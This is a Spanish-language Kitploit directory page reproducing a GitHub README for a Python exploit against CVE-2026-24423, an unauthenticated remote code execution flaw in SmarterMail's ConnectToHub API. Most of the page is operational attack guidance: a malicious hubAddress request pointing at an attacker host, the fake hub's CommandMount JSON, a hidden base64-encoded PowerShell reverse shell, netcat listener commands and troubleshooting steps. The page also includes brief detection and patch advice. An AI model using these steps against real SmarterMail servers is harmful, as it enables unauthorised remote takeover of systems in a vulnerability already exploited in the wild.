Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
SmarterMail-CVE-2026-24423- — Exploit para CVE-2026-24423 — una RCE crítica no autenticada en la API ConnectToHub de SmarterMail. Afecta a todas las compilaciones anteriores a la 9511. | Kitploit
Herramientas/GitHubGitHub/cyberalp0/smartermail-cve-2026-24423-
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubcyberalp0/smartermail-cve-2026-24423-

SmarterMail-CVE-2026-24423-

Exploit para CVE-2026-24423 — una RCE crítica no autenticada en la API ConnectToHub de SmarterMail. Afecta a todas las compilaciones anteriores a la 9511.

Ver Repositorio
hace 14h 54mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

SmarterMail ConnectToHub RCE

Un exploit basado en Python para CVE-2026-24423, una vulnerabilidad de Ejecución Remota de Código no autenticada en la funcionalidad ConnectToHub de SmarterTools SmarterMail.

Uso previsto: Solo pruebas de seguridad autorizadas, CTFs, laboratorios de Hack The Box y entornos de investigación controlados.


Tabla de Contenidos

  • Resumen
  • Detalles del CVE
  • Versiones Afectadas
  • Descripción de la Vulnerabilidad
  • Detalles Técnicos
  • Flujo de Explotación
  • Requisitos
  • Configuración
  • Uso
  • Salida Esperada
  • Solución de Problemas
  • Capturas de Pantalla
  • Estructura del Proyecto
  • Mitigación
  • Referencias
  • Aviso Legal

Resumen

CVE-2026-24423 es una vulnerabilidad de Ejecución Remota de Código no autenticada que afecta a SmarterTools SmarterMail.

La vulnerabilidad existe en la funcionalidad ConnectToHub. Un atacante no autenticado puede proporcionar un hubAddress malicioso, lo que provoca que el servidor SmarterMail realice una solicitud HTTP a un servidor controlado por el atacante.

El servidor malicioso responde con una respuesta setup-initial-connection manipulada que contiene un valor SystemMount.CommandMount controlado.

La instancia vulnerable de SmarterMail procesa posteriormente este valor como un comando del sistema operativo, permitiendo la ejecución arbitraria de comandos en el contexto de seguridad del servicio SmarterMail.

A la vulnerabilidad se le asignó una puntuación CVSS 4.0 de 9.3 (Crítica) y está clasificada como CWE-306: Autenticación faltante para una función crítica.


Detalles del CVE

CampoValor
CVECVE-2026-24423
ProveedorSmarterTools
ProductoSmarterMail
VulnerabilidadEjecución Remota de Código no autenticada
CWECWE-306
CVSS v4.09.3 Crítico
CVSS v3.19.8 Crítico
Vector de AtaqueRed
AutenticaciónNinguna
Interacción del UsuarioNinguna
ComplejidadBaja
Publicado23 de enero de 2026
Compilación Corregida9511

El registro oficial del CVE describe el problema como un RCE no autenticado a través del método de API ConnectToHub.


Versiones Afectadas

Las versiones de SmarterMail anteriores a la Compilación 9511 están afectadas.

El registro del CVE especifica el rango afectado como:

root@kitploit:~
SmarterMail < 100.0.9511

La compilación 9511, publicada el 15 de enero de 2026, contiene la corrección del proveedor.

Vulnerables

root@kitploit:~
< 100.0.9511

Corregidas

root@kitploit:~
>= 100.0.9511

Verifique siempre la compilación instalada exacta antes de intentar reproducir la vulnerabilidad.


Descripción de la Vulnerabilidad

La funcionalidad vulnerable se expone a través de la API de administración del sistema SmarterMail.

La operación relevante es:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

El endpoint acepta un parámetro hubAddress.

Conceptualmente, un atacante puede proporcionar:

root@kitploit:~
{
    "hubAddress": "http://ATTACKER_IP:8081",
    "oneTimePassword": "temporary-value",
    "nodeName": "DC"
}

SmarterMail se conecta entonces a la dirección del hub proporcionada y solicita:

root@kitploit:~
/web/api/node-management/setup-initial-connection

El servidor controlado por el atacante responde con JSON que contiene un objeto SystemMount malicioso.

La propiedad importante es:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

El valor CommandMount es utilizado posteriormente por la aplicación vulnerable como un comando del sistema operativo.

Esto permite a un atacante pasar de:

root@kitploit:~
Solicitud HTTP no autenticada

a:

root@kitploit:~
Ejecución remota de comandos

El análisis técnico de VulnCheck confirma que el hubAddress controlado por el atacante hace que SmarterMail solicite el endpoint setup-initial-connection del atacante y que el CommandMount devuelto puede proporcionar ejecución arbitraria de comandos.


Detalles Técnicos

El exploit consta de dos componentes:

1. Hub Falso de SmarterMail

El servidor Python escucha en:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

y devuelve una respuesta JSON manipulada que contiene el SystemMount.CommandMount malicioso.

2. Listener de Reverse Shell

Un listener TCP separado recibe la conexión iniciada por el comando ejecutado en el objetivo.

Este exploit utiliza intencionalmente dos puertos separados.

root@kitploit:~
8081
└── Hub Falso de SmarterMail

4455
└── Listener de Reverse Shell

Flujo de Explotación

root@kitploit:~
flowchart LR

    A[Atacante<br/>10.10.14.50]

    H[Hub Falso de SmarterMail<br/>TCP/8081]

    T[Objetivo SmarterMail<br/>10.129.57.86]

    C[CommandMount<br/>Ejecución de Comandos]

    P[PowerShell]

    L[Listener de Reverse Shell<br/>TCP/4455]

    A -->|Activar ConnectToHub| T
    T -->|HTTP POST| H
    H -->|JSON Malicioso| T
    T -->|CommandMount| C
    C --> P
    P -->|TCP inverso| L
    L --> A

Conexión 1 — Hub Falso

root@kitploit:~
Objetivo
   |
   | HTTP
   v
10.10.14.50:8081

Conexión 2 — Reverse Shell

root@kitploit:~
Objetivo
   |
   | TCP
   v
10.10.14.50:4455

Estos puertos sirven para diferentes propósitos y no deben confundirse.


Requisitos

  • Python 3
  • Máquina atacante Linux
  • VPN de Hack The Box o red autorizada equivalente
  • Conectividad de red desde el objetivo al atacante
  • Netcat
  • Instalación vulnerable de SmarterMail

El exploit utiliza únicamente módulos de la biblioteca estándar de Python:

root@kitploit:~
http.server
json
base64

No se requieren paquetes externos de Python.


Configuración

Edite las siguientes variables:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

Para el entorno de ejemplo de HTB:

root@kitploit:~
LHOST     = 10.10.14.50
LPORT     = 4455
HUB_PORT  = 8081

LHOST

LHOST es la dirección IP del atacante a la que el objetivo puede acceder.

Para Hack The Box, normalmente es la IP asignada a la interfaz VPN de HTB:

root@kitploit:~
ip addr show tun0

Ejemplo:

root@kitploit:~
tun0:
    inet 10.10.14.50

Por lo tanto:

root@kitploit:~
LHOST = "10.10.14.50"

LPORT

LPORT es el puerto TCP utilizado por el atacante para recibir la conexión inversa.

Ejemplo:

root@kitploit:~
LPORT = 4455

HUB_PORT

HUB_PORT es el puerto HTTP utilizado por el hub malicioso de SmarterMail.

Ejemplo:

root@kitploit:~
HUB_PORT = 8081

Uso

1. Clonar el repositorio

root@kitploit:~
git clone https://github.com/<username>/<repository>.git
cd <repository>

2. Configurar el exploit

Edite:

root@kitploit:~
nano exploit.py

Establezca:

root@kitploit:~
LHOST = "10.10.14.50"
LPORT = 4455
HUB_PORT = 8081

3. Iniciar el listener de reverse shell

Abra una terminal:

root@kitploit:~
nc -lvnp 4455

Salida esperada:

root@kitploit:~
Listening on 0.0.0.0 4455

Mantenga esta terminal abierta.


4. Iniciar el hub malicioso

Abra una segunda terminal:

root@kitploit:~
python3 exploit.py

Si la vinculación al puerto seleccionado requiere privilegios elevados:

root@kitploit:~
sudo python3 exploit.py

Salida esperada:

root@kitploit:~
============================================================
 SmarterMail fake hub
============================================================
[+] LHOST:      10.10.14.50
[+] LPORT:      4455
[+] HUB:        10.10.14.50:8081

[+] Waiting for SmarterMail...
============================================================

5. Activar ConnectToHub

Envíe la solicitud adecuada a la instancia vulnerable de SmarterMail.

El hubAddress proporcionado debe apuntar al servidor HTTP malicioso:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081",
    "oneTimePassword": "tempst",
    "nodeName": "DC"
}

El valor importante es:

root@kitploit:~
http://10.10.14.50:8081

No utilice el puerto del reverse shell como puerto del hub.


Resumen de Configuración de Puertos

PropósitoIPPuerto
VPN del Atacante10.10.14.50—
Hub Falso de SmarterMail10.10.14.508081
Reverse Shell10.10.14.504455
Objetivo HTB10.129.57.86—

El flujo resultante es:

root@kitploit:~
hubAddress
    ↓
10.10.14.50:8081
    ↓
CommandMount malicioso
    ↓
PowerShell
    ↓
10.10.14.50:4455

Codificación del Payload

El exploit crea dinámicamente el payload de PowerShell.

El parámetro -EncodedCommand de PowerShell espera que el comando se codifique en UTF-16LE antes de la codificación Base64.

El script realiza:

root@kitploit:~
encoded = base64.b64encode(
    PS.encode("utf-16le")
).decode()

El comando final se estructura como:

root@kitploit:~
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <BASE64>

Esto evita la codificación manual del payload y previene errores comunes de codificación UTF-8/UTF-16LE.


Salida Esperada

Cuando el objetivo alcanza el hub malicioso:

root@kitploit:~
[+] Received SmarterMail connection
[+] Path: /web/api/node-management/setup-initial-connection
[+] Body: ...
[+] Sending CommandMount payload
[+] Reverse shell -> 10.10.14.50:4455

El listener de reverse shell debería recibir posteriormente una conexión:

root@kitploit:~
Connection received on 10.129.57.86 XXXXX

Una vez conectado, se puede realizar una validación básica:

root@kitploit:~
whoami
root@kitploit:~
hostname

Solución de Problemas

El hub falso no recibe ninguna conexión

Compruebe que el servidor está escuchando:

root@kitploit:~
ss -lntp | grep 8081

Verifique la dirección VPN:

root@kitploit:~
ip addr show tun0

Confirme que LHOST coincide con la dirección accesible desde el objetivo.


El hub falso recibe HTTP 200 pero no hay shell

Una solicitud HTTP exitosa significa que la primera etapa está funcionando:

root@kitploit:~
Objetivo
  |
  | HTTP
  v
Hub Falso :8081

No significa necesariamente que la segunda etapa haya tenido éxito.

Compruebe:

root@kitploit:~
ss -lntp | grep 4455

Asegúrese de que Netcat se inició antes de activar el exploit.

También verifique:

root@kitploit:~
LHOST = IP del atacante accesible desde el objetivo
LPORT = puerto del listener

Netcat recibe la solicitud HTTP en lugar de un shell

Si ve:

root@kitploit:~
POST /web/api/node-management/setup-initial-connection

dentro de Netcat, ha apuntado hubAddress al listener de reverse shell.

Incorrecto:

root@kitploit:~
hubAddress = http://10.10.14.50:4455

Correcto:

root@kitploit:~
hubAddress = http://10.10.14.50:8081

Los dos puertos deben permanecer separados.


Respuesta HTTP 400

Una respuesta 400 puede ocurrir cuando el hub falso no devuelve la estructura esperada por SmarterMail.

Verifique que la respuesta contenga:

root@kitploit:~
"SystemMount": {
    "Enabled": true,
    "ReadOnly": false,
    "MountPath": "...",
    "CommandMount": "..."
}

También asegúrese de que la ruta solicitada sea exactamente:

root@kitploit:~
/web/api/node-management/setup-initial-connection

El análisis público de la vulnerabilidad identifica este endpoint como parte del flujo vulnerable de ConnectToHub.


Capturas de Pantalla

Añada aquí capturas de pantalla del laboratorio HTB.

1. Enumeración del Objetivo

Ejemplo:

root@kitploit:~
![Nmap Enumeration](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/nmap.png)

Captura sugerida:

  • Resultados de Nmap
  • Servicio/versión de SmarterMail
  • Puerto expuesto relevante

2. Hub Malicioso

root@kitploit:~
![Fake Hub](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/fake-hub.png)

Muestre:

root@kitploit:~
[+] Received SmarterMail connection
[+] Sending CommandMount payload

3. Activación del Exploit

root@kitploit:~
![Burp Request](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/burp-request.png)

Muestre la solicitud que contiene:

root@kitploit:~
{
    "hubAddress": "http://10.10.14.50:8081"
}

4. Reverse Shell

root@kitploit:~
![Reverse Shell](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/reverse-shell.png)

Muestre:

root@kitploit:~
Connection received on 10.129.57.86

y el prompt de comandos resultante.


Estructura del Proyecto

root@kitploit:~
smartermail-rce/
│
├── exploit.py
├── README.md
│
└── screenshots/
    ├── nmap.png
    ├── burp-request.png
    ├── fake-hub.png
    └── reverse-shell.png

Detección

Los posibles indicadores de explotación incluyen solicitudes inesperadas a:

root@kitploit:~
/api/v1/settings/sysadmin/connect-to-hub

y conexiones salientes desde el servidor SmarterMail a hosts HTTP previamente desconocidos.

Los administradores también deben revisar los registros de aplicación, IIS/reverse-proxy y de red para detectar actividad sospechosa de ConnectToHub.

CVE-2026-24423 se ha incluido en el catálogo de Vulnerabilidades Explotadas Conocidas de CISA, lo que indica que se ha observado explotación fuera de entornos de laboratorio.


Mitigación

La remediación principal es actualizar SmarterMail a la Compilación 9511 o posterior. La versión del proveedor del 15 de enero de 2026 abordó la vulnerabilidad.

Cuando no sea posible aplicar el parche de inmediato, las organizaciones también deberían considerar:

  • Restringir el acceso a las API administrativas de SmarterMail.
  • Prevenir el acceso externo innecesario a los endpoints de gestión.
  • Aplicar segmentación de red.
  • Monitorear las conexiones salientes desde el servidor SmarterMail.
  • Revisar los registros históricos en busca de solicitudes sospechosas de ConnectToHub.
  • Investigar la ejecución inesperada de comandos por parte de la cuenta de servicio de SmarterMail.

Referencias

  • Registro CVE: CVE-2026-24423
  • VulnCheck: SmarterMail ConnectToHub RCE no autenticado
  • CODE WHITE: Lista Pública de Vulnerabilidades
  • Notas de la Versión de SmarterTools SmarterMail
  • Catálogo de Vulnerabilidades Explotadas Conocidas de CISA

Aviso Legal

Este proyecto se proporciona únicamente para investigación de seguridad autorizada y fines educativos.

No utilice este exploit contra sistemas que no posea o para los que no tenga permiso explícito de prueba.

El autor no asume ninguna responsabilidad por el uso indebido, daños, pérdida de datos, acceso no autorizado u otras consecuencias derivadas del uso de este software.

Utilícelo solo en entornos controlados como:

  • Hack The Box
  • Competiciones Capture-the-Flag
  • Laboratorios personales
  • Pruebas de penetración autorizadas
  • Entornos de investigación de seguridad

Créditos

CVE-2026-24423 fue acreditado a:

  • Sina Kheirkhah
  • Piotr Bazydlo
  • Markus Wulftange
  • Cale Black

El CVE fue publicado por VulnCheck el 23 de enero de 2026.

Descargar herramienta